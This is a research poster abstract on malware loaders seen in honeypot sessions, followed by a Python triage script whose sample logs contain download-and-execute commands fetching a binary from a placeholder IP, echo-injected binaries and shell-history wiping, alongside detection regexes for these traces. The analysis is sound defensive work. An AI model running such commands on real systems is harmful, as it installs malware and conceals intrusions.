Poster: The State of Malware Loaders
Abstract
Malware is recognized as one of the most severe cybersecurity threats today. Although malware attacks are as old as the Internet, our understanding of which parts of the Internet infrastructure are used to distribute malware is still rather limited.
In this work, we analyze more than 3 million sessions established with honeypots deployed in 55 countries that are associated with the download and execution of malware binaries. We identify two main tactics for loading malware onto infected machines: injection of malware by the hosts initiating the connection (clients) and downloading malware from third parties (loaders). The latter tactic accounts for more than 80% of this class of sessions but involves a smaller number of cloud and content delivery servers, with profiles very different from those of the clients. Our analysis also shows that it is not uncommon for different malware families to rely on the same hosting infrastructure for downloading malware. Further investigation into the code executed to download and activate malware shows that criminals tend to hide their traces by deleting their shell history and modifying logs and files on the compromised machines.
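As an added illustration of the session triage the abstract describes (not code from the poster or its authors), the following Python script classifies honeypot session command logs into the two loading tactics, extracts the third-party hosts that loader sessions fetch from, and flags the history-deletion and log-tampering traces mentioned above. The session logs, IP addresses and URLs are constructed sample data, not the poster's dataset; the regular expressions are simple heuristics chosen for this example.

```python
import re
from dataclasses import dataclass, field

# Constructed honeypot session logs (sample data for this example only).
# Each session: source IP of the client and the commands it issued.
SAMPLE_SESSIONS = {
    "s1": {"src": "198.51.100.7", "cmds": [
        "cd /tmp; wget http://203.0.113.10/bins/x86 -O x86; chmod +x x86; ./x86",
        "rm -rf ~/.bash_history; history -c",
    ]},
    "s2": {"src": "198.51.100.8", "cmds": [
        "cd /tmp; curl -O http://203.0.113.10/bins/x86; chmod 777 x86; ./x86",
    ]},
    "s3": {"src": "198.51.100.9", "cmds": [
        "echo -ne '\\x7f\\x45\\x4c\\x46' > /tmp/a; echo -ne '\\x02\\x01' >> /tmp/a; chmod +x /tmp/a; /tmp/a",
        "unset HISTFILE; export HISTSIZE=0",
    ]},
    "s4": {"src": "198.51.100.10", "cmds": ["uname -a", "cat /proc/cpuinfo"]},
}

# Loader tactic: a download utility plus a URL pointing at a third-party host.
LOADER_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
URL_HOST_RE = re.compile(r"(?:https?|ftp)://([^/\s:;'\"]+)")
# Injection tactic: the client writes raw bytes into a file itself (no third party).
INJECT_RE = re.compile(r"\b(?:echo|printf)\b[^;|]*\\x[0-9a-fA-F]{2}[^;|]*>")
# Execution of a freshly dropped file from a writable directory.
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)(?:\./|/tmp/|/var/tmp/|/dev/shm/)[\w.-]+", re.M)
# Anti-forensic traces: shell history removal or log tampering.
ANTI_FORENSICS_RE = re.compile(
    r"history\s+-c|\.bash_history|unset\s+HISTFILE|HISTSIZE=0|>\s*/var/log/")


@dataclass
class Verdict:
    tactic: str                      # "loader", "injection" or "none"
    executed: bool                   # dropped file was run
    loader_hosts: list = field(default_factory=list)
    anti_forensics: bool = False


def classify_session(cmds):
    """Assign one session's command list to a loading tactic and collect traces."""
    joined = "\n".join(cmds)
    hosts = []
    for m in URL_HOST_RE.finditer(joined):
        if m.group(1) not in hosts:
            hosts.append(m.group(1))
    if LOADER_RE.search(joined) and hosts:
        tactic = "loader"
    elif INJECT_RE.search(joined):
        tactic = "injection"
    else:
        tactic = "none"
    return Verdict(
        tactic=tactic,
        executed=bool(EXEC_RE.search(joined)),
        loader_hosts=hosts,
        anti_forensics=bool(ANTI_FORENSICS_RE.search(joined)),
    )


def summarize(sessions):
    """Aggregate per-session verdicts: loader share and hosts reused across sessions."""
    verdicts = {sid: classify_session(s["cmds"]) for sid, s in sessions.items()}
    malware = {sid: v for sid, v in verdicts.items() if v.tactic != "none"}
    loaders = [sid for sid, v in malware.items() if v.tactic == "loader"]
    host_to_sessions = {}
    for sid, v in malware.items():
        for h in v.loader_hosts:
            host_to_sessions.setdefault(h, []).append(sid)
    return {
        "malware_sessions": len(malware),
        "loader_share": len(loaders) / len(malware) if malware else 0.0,
        # Hosts serving binaries to more than one session (shared infrastructure).
        "shared_hosts": {h: sorted(s) for h, s in host_to_sessions.items() if len(s) > 1},
        "anti_forensics_sessions": sorted(sid for sid, v in malware.items() if v.anti_forensics),
    }


if __name__ == "__main__":
    for sid, s in SAMPLE_SESSIONS.items():
        print(sid, s["src"], classify_session(s["cmds"]))
    print(summarize(SAMPLE_SESSIONS))
```

On the constructed data, sessions s1 and s2 are loader sessions fetching from the same host, s3 is client-side injection, and s4 downloads nothing; the summary reports the loader share and the host shared by two sessions, which is the kind of reuse across sessions the poster reports on its real data.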